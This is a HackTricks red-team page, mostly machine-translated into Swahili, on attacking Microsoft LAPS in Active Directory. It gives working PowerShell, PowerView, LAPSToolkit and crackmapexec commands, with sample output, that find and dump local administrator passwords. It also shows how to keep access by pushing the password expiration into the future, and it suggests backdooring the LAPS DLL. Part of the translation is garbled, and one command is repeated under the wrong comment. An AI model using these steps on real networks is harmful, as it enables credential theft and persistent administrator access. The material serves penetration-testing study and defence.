LAPS

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Websec | Uw Cybersecurity Specialist

Basic Information

Local Administrator Password Solution (LAPS) ni chombo kinachotumika kwa usimamizi wa mfumo ambapo nywila za msimamizi, ambazo ni za kipekee, zilizopangwa kwa nasibu, na hubadilishwa mara kwa mara, zinatumika kwa kompyuta zilizounganishwa kwenye eneo. Nywila hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinapatikana tu kwa watumiaji ambao wamepewa ruhusa kupitia Orodha za Udhibiti wa Ufikiaji (ACLs). Usalama wa uhamasishaji wa nywila kutoka kwa mteja hadi seva unahakikishwa kwa kutumia Kerberos toleo la 5 na Kiwango cha Ulinzi wa Juu (AES).

Katika vitu vya kompyuta vya eneo, utekelezaji wa LAPS unapelekea kuongeza sifa mbili mpya: ms-mcs-AdmPwd na ms-mcs-AdmPwdExpirationTime. Sifa hizi zinahifadhi nywila ya msimamizi ya maandiko na wakati wake wa kuisha, mtawalia.

Check if activated

reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled

dir "C:\Program Files\LAPS\CSE"
# Check if that folder exists and contains AdmPwd.dll

# Find GPOs that have "LAPS" or some other descriptive term in the name
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl

# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname

LAPS Password Access

You could download the raw LAPS policy from \\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol and then use Parse-PolFile from the GPRegistryPolicyParser package can be used to convert this file into human-readable format.

Moreover, the native LAPS PowerShell cmdlets can be used if they're installed on a machine we have access to:

Get-Command *AdmPwd*

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS

# List who can read LAPS password of the given OU
Find-AdmPwdExtendedRights -Identity Workstations | fl

# Read the password
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

PowerView inaweza pia kutumika kugundua nani anaweza kusoma nenosiri na kulisoma:

# Find the principals that have ReadPropery on ms-Mcs-AdmPwd
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

# Read the password
Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd

LAPSToolkit

The LAPSToolkit inarahisisha kuorodhesha LAPS hii kwa kutumia kazi kadhaa. Moja ni kuchambua ExtendedRights kwa kompyuta zote zenye LAPS imewezeshwa. Hii itaonyesha makundi yaliyotengwa mahsusi kusoma nywila za LAPS, ambayo mara nyingi ni watumiaji katika makundi yaliyolindwa. Akaunti ambayo ime jiunga na kompyuta kwenye kanda inapata All Extended Rights juu ya mwenyeji huo, na haki hii inampa akaunti uwezo wa kusoma nywila. Kuorodhesha kunaweza kuonyesha akaunti ya mtumiaji ambayo inaweza kusoma nywila ya LAPS kwenye mwenyeji. Hii inaweza kutusaidia kulenga watumiaji maalum wa AD ambao wanaweza kusoma nywila za LAPS.

# Get groups that can read passwords
Find-LAPSDelegatedGroups

OrgUnit                                           Delegated Groups
-------                                           ----------------
OU=Servers,DC=DOMAIN_NAME,DC=LOCAL                DOMAIN_NAME\Domain Admins
OU=Workstations,DC=DOMAIN_NAME,DC=LOCAL           DOMAIN_NAME\LAPS Admin

# Checks the rights on each computer with LAPS enabled for any groups
# with read access and users with "All Extended Rights"
Find-AdmPwdExtendedRights
ComputerName                Identity                    Reason
------------                --------                    ------
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\Domain Admins   Delegated
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\LAPS Admins     Delegated

# Get computers with LAPS enabled, expirations time and the password (if you have access)
Get-LAPSComputers
ComputerName                Password       Expiration
------------                --------       ----------
DC01.DOMAIN_NAME.LOCAL      j&gR+A(s976Rf% 12/10/2022 13:24:41

Kutoa Nywila za LAPS Kwa Kutumia Crackmapexec

Ikiwa hakuna ufikiaji wa powershell unaweza kutumia haki hii kwa mbali kupitia LDAP kwa kutumia

crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps

This will dump all the passwords that the user can read, allowing you to get a better foothold with a different user.

LAPS Persistence

Tarehe ya Kuisha

Once admin, it's possible to obtain the passwords and prevent a machine from updating its password by setting the expiration date into the future.

# Get expiration time
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime

# Change expiration time
## It's needed SYSTEM on the computer
Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}

Nenosiri bado litarejeshwa ikiwa admin atatumia Reset-AdmPwdPassword cmdlet; au ikiwa Usiruhusu muda wa kuisha kwa nenosiri kuwa mrefu zaidi ya inavyohitajika na sera imewezeshwa katika LAPS GPO.

Backdoor

Msimbo wa asili wa LAPS unaweza kupatikana hapa, kwa hivyo inawezekana kuweka backdoor katika msimbo (ndani ya Get-AdmPwdPassword njia katika Main/AdmPwd.PS/Main.cs kwa mfano) ambayo kwa namna fulani itafanya kuhamasisha nenosiri mpya au kuyahifadhi mahali fulani.

Kisha, tu kompilisha AdmPwd.PS.dll mpya na uipakie kwenye mashine katika C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll (na ubadilishe muda wa mabadiliko).

References

https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/

Websec | Uw Cybersecurity Specialist

Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousKerberos Double Hop Problem NextMSSQL AD Abuse

Last updated 7 days ago